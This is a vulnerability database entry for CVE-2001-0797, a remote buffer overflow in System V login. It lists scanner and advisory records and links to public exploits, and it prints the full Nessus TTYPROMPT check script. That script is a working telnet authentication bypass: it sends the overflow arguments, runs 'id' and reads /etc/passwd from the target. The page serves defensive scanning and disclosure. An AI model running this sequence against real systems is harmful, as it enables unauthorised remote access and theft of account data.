CVE-2001-0797 - Buffer Overflow vulnerability in Multiple Vendor System V Derived 'login'

CVSS 10.0 - CRITICAL
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: COMPLETE
Integrity impact: COMPLETE
Availability impact: COMPLETE
Tags: network, low complexity, sgi, hp, ibm, sco, sun, critical, nessus, exploit available, metasploit

Summary

Buffer overflow in login in various System V based operating systems allows remote attackers to execute arbitrary commands via a large number of arguments through services such as telnet and rlogin.

Exploit-Db

  • description: Solaris/SPARC 2.5.1/2.6/7/8 Derived 'login' Buffer Overflow Vulnerability. CVE-2001-0797. Remote exploit for solaris platform
    id: EDB-ID:21180
    last seen: 2016-02-02
    modified: 2004-12-04
    published: 2004-12-04
    reporter: Marco Ivaldi
    source: https://www.exploit-db.com/download/21180/
    title: Solaris/SPARC 2.5.1/2.6/7/8 Derived 'login' Buffer Overflow Vulnerability
  • description: Solaris 2.6/7/8 (TTYPROMPT in.telnet) Remote Authentication Bypass. CVE-2001-0797. Remote exploit for solaris platform
    id: EDB-ID:57
    last seen: 2016-01-31
    modified: 2002-11-02
    published: 2002-11-02
    reporter: Jonathan S.
    source: https://www.exploit-db.com/download/57/
    title: Solaris 2.6/7/8 TTYPROMPT in.telnet Remote Authentication Bypass
  • description: Solaris 2.x/7.0/8 Derived 'login' Buffer Overflow Vulnerability. CVE-2001-0797. Remote exploit for solaris platform
    id: EDB-ID:21179
    last seen: 2016-02-02
    modified: 2003-01-09
    published: 2003-01-09
    reporter: snooq
    source: https://www.exploit-db.com/download/21179/
    title: Solaris 2.x/7.0/8 Derived 'login' Buffer Overflow Vulnerability
  • description: System V Derived /bin/login Extraneous Arguments Buffer Overflow. CVE-2001-0797. Remote exploit for linux platform
    id: EDB-ID:16928
    last seen: 2016-02-02
    modified: 2010-07-03
    published: 2010-07-03
    reporter: metasploit
    source: https://www.exploit-db.com/download/16928/
    title: System V Derived /bin/login Extraneous Arguments Buffer Overflow
  • description: Solaris in.telnetd TTYPROMPT Buffer Overflow. CVE-2001-0797. Remote exploit for solaris platform
    id: EDB-ID:9917
    last seen: 2016-02-01
    modified: 2002-01-18
    published: 2002-01-18
    reporter: MC
    source: https://www.exploit-db.com/download/9917/
    title: Solaris in.telnetd TTYPROMPT - Buffer Overflow
  • description: Solaris 2.5.1/2.6/7/8 rlogin /bin/login Buffer Overflow Exploit (SPARC). CVE-2001-0797. Remote exploit for solaris platform
    id: EDB-ID:716
    last seen: 2016-01-31
    modified: 2004-12-24
    published: 2004-12-24
    reporter: Marco Ivaldi
    source: https://www.exploit-db.com/download/716/
    title: Solaris 2.5.1/2.6/7/8 rlogin /bin/login - Buffer Overflow Exploit SPARC
  • description: System V Derived /bin/login Extraneous Arguments Buffer Overflow (modem based). CVE-2001-0797. Remote exploit for solaris platform
    id: EDB-ID:10036
    last seen: 2016-02-01
    modified: 2001-12-12
    published: 2001-12-12
    reporter: I)ruid
    source: https://www.exploit-db.com/download/10036/
    title: System V Derived /bin/login Extraneous Arguments Buffer Overflow modem based
  • description: Solaris in.telnetd TTYPROMPT Buffer Overflow. CVE-2001-0797. Remote exploit for solaris platform
    id: EDB-ID:16327
    last seen: 2016-02-01
    modified: 2010-06-22
    published: 2010-06-22
    reporter: metasploit
    source: https://www.exploit-db.com/download/16327/
    title: Solaris in.telnetd TTYPROMPT Buffer Overflow
  • description: Solaris /bin/login Remote Root Exploit (SPARC/x86). CVE-2001-0797. Remote exploit for linux platform
    id: EDB-ID:346
    last seen: 2016-01-31
    modified: 2001-12-20
    published: 2001-12-20
    reporter: Teso
    source: https://www.exploit-db.com/download/346/
    title: Solaris /bin/login Remote Root Exploit SPARC/x86

Metasploit

Nessus

  • NASL family: Gain a shell remotely
    NASL id: TTYPROMPT.NASL
    description: The remote implementation of the /bin/login utility, used when authenticating a user via telnet or rsh, contains an overflow which allows an attacker to gain a shell on this host, without even sending a shell code. An attacker may use this flaw to log in as any user (except root) on the remote host.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 11136
    published: 2002-10-03
    reporter: This script is Copyright (C) 2002-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/11136
    title: Multiple OS /bin/login Remote Overflow
    code:
    #
    # (C) Tenable Network Security, Inc.
    #  
    
    include("compat.inc");
    
    if (description)
    {
     script_id(11136);
     script_version("1.27");
     script_cvs_date("Date: 2018/08/01 17:36:12");
    
     script_cve_id("CVE-2001-0797");
     script_bugtraq_id(3681, 5848);
     script_xref(name:"CERT-CC", value:"CA-2001-34");
    
     script_name(english:"Multiple OS /bin/login Remote Overflow");
     script_summary(english:"Attempts to log into the remote host");
     
     script_set_attribute(attribute:"synopsis", value:"It is possible to execute arbitrary commands on the remote host.");
     script_set_attribute(attribute:"description", value:
    "The remote implementation of the /bin/login utility, used when
    authenticating a user via telnet or rsh contains an overflow which
    allows an attacker to gain a shell on this host, without even sending a
    shell code. 
    
    An attacker may use this flaw to log in as any user (except root) on the
    remote host.");
     script_set_attribute(attribute:"solution", value:"Contact the vendor for a patch.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploited_by_malware", value:"true");
     script_set_attribute(attribute:"metasploit_name", value:'Solaris in.telnetd TTYPROMPT Buffer Overflow');
     script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
     script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
     script_set_attribute(attribute:"canvas_package", value:'CANVAS');
    
     script_set_attribute(attribute:"vuln_publication_date", value:"2001/12/12");
     script_set_attribute(attribute:"plugin_publication_date", value:"2002/10/03");
    
     script_set_attribute(attribute:"plugin_type", value:"remote");
     script_end_attributes();
     
     # It might cause problem on some systems
     script_category(ACT_DESTRUCTIVE_ATTACK);
     script_copyright(english:"This script is Copyright (C) 2002-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
     script_family(english:"Gain a shell remotely");
     script_dependencie("find_service1.nasl");
     script_require_ports("Services/telnet", 23);
     exit(0);
    }
    
    include("data_protection.inc");
    
    global_var soc;
    
    function init()
    {
     local_var c, i, lim, r, s;
    
     send(socket:soc, data:raw_string(
    	0xFF, 252, 0x25,
    	0xFF, 254, 0x26,
    	0xFF, 252, 0x26,
    	0xFF, 254, 0x03,
    	0xFF, 252, 0x18,
    	0xFF, 252, 0x1F,
    	0xFF, 252, 0x20,
    	0xFF, 252, 0x21,
    	0xFF, 252, 0x22,
    	0xFF, 0xFB, 0x27,
    	0xFF, 254, 0x05,
    	0xFF, 252, 0x23));
     r = recv(socket:soc, length:30);
     lim = strlen(r);
     for(i=0;i<lim - 2;i=i+3)
     {
      if(!(ord(r[i+2]) == 0x27))
      {
      if(ord(r[i+1]) == 251) c = 254;
      if(ord(r[i+1]) == 252) c = 254;
      if(ord(r[i+1]) == 253) c = 252;
      if(ord(r[i+1]) == 254) c = 252;
      
      s = raw_string(ord(r[i]), c, ord(r[i+2]));
      send(socket:soc, data:s);
      }
     }
     
     
     send(socket:soc, data:raw_string(0xFF, 0xFC, 0x24));
     
     
     r = recv(socket:soc, length:300);
     
     send(socket:soc, data:raw_string(0xFF, 0xFA, 0x27, 0x00, 0x03, 0x54, 0x54, 0x59, 0x50, 0x52, 0x4F, 0x4D, 0x50, 0x54, 0x01, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0xFF, 0xF0));
    }
    
    port = get_kb_item("Services/telnet");
    if(!port)port = 23;
    
    if(!get_port_state(port))exit(0);
    
    soc = open_sock_tcp(port);
    
    if(soc)
    {
      buf = init();
      send(socket:soc, data:string("bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\r\n"));
      r = recv(socket:soc, length:4096);
      if(!r)exit(0);
      send(socket:soc, data:string("id\r\n"));
      r = recv(socket:soc, length:1024);
      if("uid=" >< r){
       send(socket:soc, data:string("cat /etc/passwd\r\n"));
       r = recv(socket:soc, length:4096);
       r = data_protection::redact_etc_passwd(output:r);
       report = string("Here is the output of the command 'cat /etc/passwd' :\n", r);
       security_hole(port:port, extra:report);
      }
    }
    
  • NASL family: Gain a shell remotely
    NASL id: BINLOGIN_OVERFLOW_TELNET.NASL
    description: The remote /bin/login seems to crash when it receives too many environment variables. This is likely due to a buffer overflow vulnerability which might allow an attacker to execute arbitrary code on the remote host.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 10827
    published: 2001-12-15
    reporter: This script is Copyright (C) 2001-2018 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/10827
    title: SysV /bin/login Environment Remote Overflow (telnet check)
  • NASL family: Gain a shell remotely
    NASL id: BINLOGIN_OVERFLOW_RLOGIN.NASL
    description: The remote /bin/login seems to crash when it receives too many environment variables. This is likely due to a buffer overflow vulnerability which might allow an attacker to execute arbitrary code on the remote host.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 10828
    published: 2001-12-15
    reporter: This script is Copyright (C) 2001-2018 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/10828
    title: SysV /bin/login Environment Remote Overflow (rlogin)

Oval

accepted: 2005-02-23T09:25:00.000-04:00
class: vulnerability
contributors:
  name: Brian Soby
  organization: The MITRE Corporation
description: Buffer overflow in login in various System V based operating systems allows remote attackers to execute arbitrary commands via a large number of arguments through services such as telnet and rlogin.
family: unix
id: oval:org.mitre.oval:def:2025
status: accepted
submitted: 2004-12-29T12:00:00.000-04:00
title: System V login Buffer Overflow
version: 35

Packetstorm

Saint

bid: 3681
description: System V login argument array buffer overflow
id: shell_loginbo
osvdb: 690
title: systemv_login
type: remote

Seebug

  • bulletinFamily: exploit
    description: No description provided by source.
    id: SSV:62958
    last seen: 2017-11-19
    modified: 2014-07-01
    published: 2014-07-01
    reporter: Root
    source: https://www.seebug.org/vuldb/ssvid-62958
    title: Solaris 2.5.1/2.6/7/8 rlogin /bin/login - Buffer Overflow Exploit (SPARC)
  • bulletinFamily: exploit
    description: No description provided by source.
    id: SSV:75016
    last seen: 2017-11-19
    modified: 2014-07-01
    published: 2014-07-01
    reporter: Root
    source: https://www.seebug.org/vuldb/ssvid-75016
    title: Solaris/SPARC 2.5.1/2.6/7/8 Derived 'login' Buffer Overflow Vulnerability
  • bulletinFamily: exploit
    description: No description provided by source.
    id: SSV:8658
    last seen: 2017-11-19
    modified: 2008-06-05
    published: 2008-06-05
    reporter: Root
    source: https://www.seebug.org/vuldb/ssvid-8658
    title: Solaris 2.5.1/2.6/7/8 rlogin /bin/login Buffer Overflow Exploit (SPARC)